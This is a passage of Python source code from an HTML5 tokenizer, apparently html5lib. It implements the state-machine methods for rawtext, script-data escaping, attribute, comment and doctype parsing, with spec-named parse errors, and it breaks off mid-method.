self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "</" + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.rcdataState
return True
def rawtextLessThanSignState(self):
data = self.stream.char()
if data == "/":
self.temporaryBuffer = ""
self.state = self.rawtextEndTagOpenState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.stream.unget(data)
self.state = self.rawtextState
return True
def rawtextEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer += data
self.state = self.rawtextEndTagNameState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"})
self.stream.unget(data)
self.state = self.rawtextState
return True
def rawtextEndTagNameState(self):
appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.beforeAttributeNameState
elif data == "/" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.selfClosingStartTagState
elif data == ">" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "</" + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.rawtextState
return True
def scriptDataLessThanSignState(self):
data = self.stream.char()
if data == "/":
self.temporaryBuffer = ""
self.state = self.scriptDataEndTagOpenState
elif data == "!":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<!"})
self.state = self.scriptDataEscapeStartState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer += data
self.state = self.scriptDataEndTagNameState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"})
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEndTagNameState(self):
appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.beforeAttributeNameState
elif data == "/" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.selfClosingStartTagState
elif data == ">" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "</" + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEscapeStartState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataEscapeStartDashState
else:
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEscapeStartDashState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataEscapedDashDashState
else:
self.stream.unget(data)
self.state = self.scriptDataState
return True
def scriptDataEscapedState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataEscapedDashState
elif data == "<":
self.state = self.scriptDataEscapedLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
elif data == EOF:
self.state = self.dataState
else:
chars = self.stream.charsUntil(("<", "-", "\u0000"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def scriptDataEscapedDashState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataEscapedDashDashState
elif data == "<":
self.state = self.scriptDataEscapedLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
self.state = self.scriptDataEscapedState
elif data == EOF:
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedDashDashState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
elif data == "<":
self.state = self.scriptDataEscapedLessThanSignState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": ">"})
self.state = self.scriptDataState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
self.state = self.scriptDataEscapedState
elif data == EOF:
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedLessThanSignState(self):
data = self.stream.char()
if data == "/":
self.temporaryBuffer = ""
self.state = self.scriptDataEscapedEndTagOpenState
elif data in asciiLetters:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<" + data})
self.temporaryBuffer = data
self.state = self.scriptDataDoubleEscapeStartState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedEndTagOpenState(self):
data = self.stream.char()
if data in asciiLetters:
self.temporaryBuffer = data
self.state = self.scriptDataEscapedEndTagNameState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "</"})
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataEscapedEndTagNameState(self):
appropriate = self.currentToken and self.currentToken["name"].lower() == self.temporaryBuffer.lower()
data = self.stream.char()
if data in spaceCharacters and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.beforeAttributeNameState
elif data == "/" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.state = self.selfClosingStartTagState
elif data == ">" and appropriate:
self.currentToken = {"type": tokenTypes["EndTag"],
"name": self.temporaryBuffer,
"data": [], "selfClosing": False}
self.emitCurrentToken()
self.state = self.dataState
elif data in asciiLetters:
self.temporaryBuffer += data
else:
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "</" + self.temporaryBuffer})
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataDoubleEscapeStartState(self):
data = self.stream.char()
if data in (spaceCharacters | frozenset(("/", ">"))):
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
if self.temporaryBuffer.lower() == "script":
self.state = self.scriptDataDoubleEscapedState
else:
self.state = self.scriptDataEscapedState
elif data in asciiLetters:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.temporaryBuffer += data
else:
self.stream.unget(data)
self.state = self.scriptDataEscapedState
return True
def scriptDataDoubleEscapedState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataDoubleEscapedDashState
elif data == "<":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.state = self.scriptDataDoubleEscapedLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
elif data == EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-script-in-script"})
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
return True
def scriptDataDoubleEscapedDashState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
self.state = self.scriptDataDoubleEscapedDashDashState
elif data == "<":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.state = self.scriptDataDoubleEscapedLessThanSignState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
self.state = self.scriptDataDoubleEscapedState
elif data == EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-script-in-script"})
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.state = self.scriptDataDoubleEscapedState
return True
def scriptDataDoubleEscapedDashDashState(self):
data = self.stream.char()
if data == "-":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "-"})
elif data == "<":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "<"})
self.state = self.scriptDataDoubleEscapedLessThanSignState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": ">"})
self.state = self.scriptDataState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data": "\uFFFD"})
self.state = self.scriptDataDoubleEscapedState
elif data == EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-script-in-script"})
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.state = self.scriptDataDoubleEscapedState
return True
def scriptDataDoubleEscapedLessThanSignState(self):
data = self.stream.char()
if data == "/":
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": "/"})
self.temporaryBuffer = ""
self.state = self.scriptDataDoubleEscapeEndState
else:
self.stream.unget(data)
self.state = self.scriptDataDoubleEscapedState
return True
def scriptDataDoubleEscapeEndState(self):
data = self.stream.char()
if data in (spaceCharacters | frozenset(("/", ">"))):
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
if self.temporaryBuffer.lower() == "script":
self.state = self.scriptDataEscapedState
else:
self.state = self.scriptDataDoubleEscapedState
elif data in asciiLetters:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": data})
self.temporaryBuffer += data
else:
self.stream.unget(data)
self.state = self.scriptDataDoubleEscapedState
return True
def beforeAttributeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data in asciiLetters:
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
elif data == ">":
self.emitCurrentToken()
elif data == "/":
self.state = self.selfClosingStartTagState
elif data in ("'", '"', "=", "<"):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"invalid-character-in-attribute-name"})
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"].append(["\uFFFD", ""])
self.state = self.attributeNameState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-attribute-name-but-got-eof"})
self.state = self.dataState
else:
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
return True
def attributeNameState(self):
data = self.stream.char()
leavingThisState = True
emitToken = False
if data == "=":
self.state = self.beforeAttributeValueState
elif data in asciiLetters:
self.currentToken["data"][-1][0] += data +\
self.stream.charsUntil(asciiLetters, True)
leavingThisState = False
elif data == ">":
# XXX If we emit here the attributes are converted to a dict
# without being checked and when the code below runs we error
# because data is a dict not a list
emitToken = True
elif data in spaceCharacters:
self.state = self.afterAttributeNameState
elif data == "/":
self.state = self.selfClosingStartTagState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"][-1][0] += "\uFFFD"
leavingThisState = False
elif data in ("'", '"', "<"):
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data":
"invalid-character-in-attribute-name"})
self.currentToken["data"][-1][0] += data
leavingThisState = False
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "eof-in-attribute-name"})
self.state = self.dataState
else:
self.currentToken["data"][-1][0] += data
leavingThisState = False
if leavingThisState:
# Attributes are not dropped at this stage. That happens when the
# start tag token is emitted so values can still be safely appended
# to attributes, but we do want to report the parse error in time.
if self.lowercaseAttrName:
self.currentToken["data"][-1][0] = (
self.currentToken["data"][-1][0].translate(asciiUpper2Lower))
for name, value in self.currentToken["data"][:-1]:
if self.currentToken["data"][-1][0] == name:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"duplicate-attribute"})
break
# XXX Fix for above XXX
if emitToken:
self.emitCurrentToken()
return True
def afterAttributeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data == "=":
self.state = self.beforeAttributeValueState
elif data == ">":
self.emitCurrentToken()
elif data in asciiLetters:
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
elif data == "/":
self.state = self.selfClosingStartTagState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"].append(["\uFFFD", ""])
self.state = self.attributeNameState
elif data in ("'", '"', "<"):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"invalid-character-after-attribute-name"})
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-end-of-tag-but-got-eof"})
self.state = self.dataState
else:
self.currentToken["data"].append([data, ""])
self.state = self.attributeNameState
return True
def beforeAttributeValueState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data == "\"":
self.state = self.attributeValueDoubleQuotedState
elif data == "&":
self.state = self.attributeValueUnQuotedState
self.stream.unget(data)
elif data == "'":
self.state = self.attributeValueSingleQuotedState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-attribute-value-but-got-right-bracket"})
self.emitCurrentToken()
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"][-1][1] += "\uFFFD"
self.state = self.attributeValueUnQuotedState
elif data in ("=", "<", "`"):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"equals-in-unquoted-attribute-value"})
self.currentToken["data"][-1][1] += data
self.state = self.attributeValueUnQuotedState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-attribute-value-but-got-eof"})
self.state = self.dataState
else:
self.currentToken["data"][-1][1] += data
self.state = self.attributeValueUnQuotedState
return True
def attributeValueDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.afterAttributeValueState
elif data == "&":
self.processEntityInAttribute('"')
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"][-1][1] += "\uFFFD"
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-attribute-value-double-quote"})
self.state = self.dataState
else:
self.currentToken["data"][-1][1] += data +\
self.stream.charsUntil(("\"", "&", "\u0000"))
return True
def attributeValueSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.afterAttributeValueState
elif data == "&":
self.processEntityInAttribute("'")
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"][-1][1] += "\uFFFD"
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-attribute-value-single-quote"})
self.state = self.dataState
else:
self.currentToken["data"][-1][1] += data +\
self.stream.charsUntil(("'", "&", "\u0000"))
return True
def attributeValueUnQuotedState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeAttributeNameState
elif data == "&":
self.processEntityInAttribute(">")
elif data == ">":
self.emitCurrentToken()
elif data in ('"', "'", "=", "<", "`"):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-character-in-unquoted-attribute-value"})
self.currentToken["data"][-1][1] += data
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"][-1][1] += "\uFFFD"
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-attribute-value-no-quotes"})
self.state = self.dataState
else:
self.currentToken["data"][-1][1] += data + self.stream.charsUntil(
frozenset(("&", ">", '"', "'", "=", "<", "`", "\u0000")) | spaceCharacters)
return True
def afterAttributeValueState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeAttributeNameState
elif data == ">":
self.emitCurrentToken()
elif data == "/":
self.state = self.selfClosingStartTagState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-EOF-after-attribute-value"})
self.stream.unget(data)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-character-after-attribute-value"})
self.stream.unget(data)
self.state = self.beforeAttributeNameState
return True
def selfClosingStartTagState(self):
data = self.stream.char()
if data == ">":
self.currentToken["selfClosing"] = True
self.emitCurrentToken()
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data":
"unexpected-EOF-after-solidus-in-tag"})
self.stream.unget(data)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-character-after-solidus-in-tag"})
self.stream.unget(data)
self.state = self.beforeAttributeNameState
return True
def bogusCommentState(self):
# Make a new comment token and give it as value all the characters
# until the first > or EOF (charsUntil checks for EOF automatically)
# and emit it.
data = self.stream.charsUntil(">")
data = data.replace("\u0000", "\uFFFD")
self.tokenQueue.append(
{"type": tokenTypes["Comment"], "data": data})
# Eat the character directly after the bogus comment which is either a
# ">" or an EOF.
self.stream.char()
self.state = self.dataState
return True
def markupDeclarationOpenState(self):
charStack = [self.stream.char()]
if charStack[-1] == "-":
charStack.append(self.stream.char())
if charStack[-1] == "-":
self.currentToken = {"type": tokenTypes["Comment"], "data": ""}
self.state = self.commentStartState
return True
elif charStack[-1] in ('d', 'D'):
matched = True
for expected in (('o', 'O'), ('c', 'C'), ('t', 'T'),
('y', 'Y'), ('p', 'P'), ('e', 'E')):
charStack.append(self.stream.char())
if charStack[-1] not in expected:
matched = False
break
if matched:
self.currentToken = {"type": tokenTypes["Doctype"],
"name": "",
"publicId": None, "systemId": None,
"correct": True}
self.state = self.doctypeState
return True
elif (charStack[-1] == "[" and
self.parser is not None and
self.parser.tree.openElements and
self.parser.tree.openElements[-1].namespace != self.parser.tree.defaultNamespace):
matched = True
for expected in ["C", "D", "A", "T", "A", "["]:
charStack.append(self.stream.char())
if charStack[-1] != expected:
matched = False
break
if matched:
self.state = self.cdataSectionState
return True
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-dashes-or-doctype"})
while charStack:
self.stream.unget(charStack.pop())
self.state = self.bogusCommentState
return True
def commentStartState(self):
data = self.stream.char()
if data == "-":
self.state = self.commentStartDashState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"incorrect-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["data"] += data
self.state = self.commentState
return True
def commentStartDashState(self):
data = self.stream.char()
if data == "-":
self.state = self.commentEndState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "-\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"incorrect-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["data"] += "-" + data
self.state = self.commentState
return True
def commentState(self):
data = self.stream.char()
if data == "-":
self.state = self.commentEndDashState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "\uFFFD"
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "eof-in-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["data"] += data + \
self.stream.charsUntil(("-", "\u0000"))
return True
def commentEndDashState(self):
data = self.stream.char()
if data == "-":
self.state = self.commentEndState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "-\uFFFD"
self.state = self.commentState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment-end-dash"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["data"] += "-" + data
self.state = self.commentState
return True
def commentEndState(self):
data = self.stream.char()
if data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "--\uFFFD"
self.state = self.commentState
elif data == "!":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-bang-after-double-dash-in-comment"})
self.state = self.commentEndBangState
elif data == "-":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-dash-after-double-dash-in-comment"})
self.currentToken["data"] += data
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment-double-dash"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
# XXX
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-comment"})
self.currentToken["data"] += "--" + data
self.state = self.commentState
return True
def commentEndBangState(self):
data = self.stream.char()
if data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == "-":
self.currentToken["data"] += "--!"
self.state = self.commentEndDashState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["data"] += "--!\uFFFD"
self.state = self.commentState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-comment-end-bang-state"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["data"] += "--!" + data
self.state = self.commentState
return True
def doctypeState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeDoctypeNameState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-doctype-name-but-got-eof"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"need-space-after-doctype"})
self.stream.unget(data)
self.state = self.beforeDoctypeNameState
return True
def beforeDoctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-doctype-name-but-got-right-bracket"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["name"] = "\uFFFD"
self.state = self.doctypeNameState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-doctype-name-but-got-eof"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["name"] = data
self.state = self.doctypeNameState
return True
def doctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower)
self.state = self.afterDoctypeNameState
elif data == ">":
self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower)
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["name"] += "\uFFFD"
self.state = self.doctypeNameState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype-name"})
self.currentToken["correct"] = False
self.currentToken["name"] = self.currentToken["name"].translate(asciiUpper2Lower)
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["name"] += data
return True
def afterDoctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.currentToken["correct"] = False
self.stream.unget(data)
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
if data in ("p", "P"):
matched = True
for expected in (("u", "U"), ("b", "B"), ("l", "L"),
("i", "I"), ("c", "C")):
data = self.stream.char()
if data not in expected:
matched = False
break
if matched:
self.state = self.afterDoctypePublicKeywordState
return True
elif data in ("s", "S"):
matched = True
for expected in (("y", "Y"), ("s", "S"), ("t", "T"),
("e", "E"), ("m", "M")):
data = self.stream.char()
if data not in expected:
matched = False
break
if matched:
self.state = self.afterDoctypeSystemKeywordState
return True
# All the characters read before the current 'data' will be
# [a-zA-Z], so they're garbage in the bogus doctype and can be
# discarded; only the latest character might be '>' or EOF
# and needs to be ungetted
self.stream.unget(data)
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-space-or-right-bracket-in-doctype", "datavars":
{"data": data}})
self.currentToken["correct"] = False
self.state = self.bogusDoctypeState
return True
def afterDoctypePublicKeywordState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeDoctypePublicIdentifierState
elif data in ("'", '"'):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.stream.unget(data)
self.state = self.beforeDoctypePublicIdentifierState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.stream.unget(data)
self.state = self.beforeDoctypePublicIdentifierState
return True
def beforeDoctypePublicIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == "\"":
self.currentToken["publicId"] = ""
self.state = self.doctypePublicIdentifierDoubleQuotedState
elif data == "'":
self.currentToken["publicId"] = ""
self.state = self.doctypePublicIdentifierSingleQuotedState
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["correct"] = False
self.state = self.bogusDoctypeState
return True
def doctypePublicIdentifierDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.afterDoctypePublicIdentifierState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["publicId"] += "\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["publicId"] += data
return True
def doctypePublicIdentifierSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.afterDoctypePublicIdentifierState
elif data == "\u0000":
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "invalid-codepoint"})
self.currentToken["publicId"] += "\uFFFD"
elif data == ">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-end-of-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-doctype"})
self.currentToken["correct"] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken["publicId"] += data
return True
def afterDoctypePublicIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.betweenDoctypePublicAndSystemIdentifiersState
elif data == ">":
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == '"':
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierDoubleQuotedState
elif data == "'":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-char-in-doctype"})
self.currentToken["systemId"] = ""
self.state = self.doctypeSystemIdentifierSingleQuotedState
elif data is EOF:
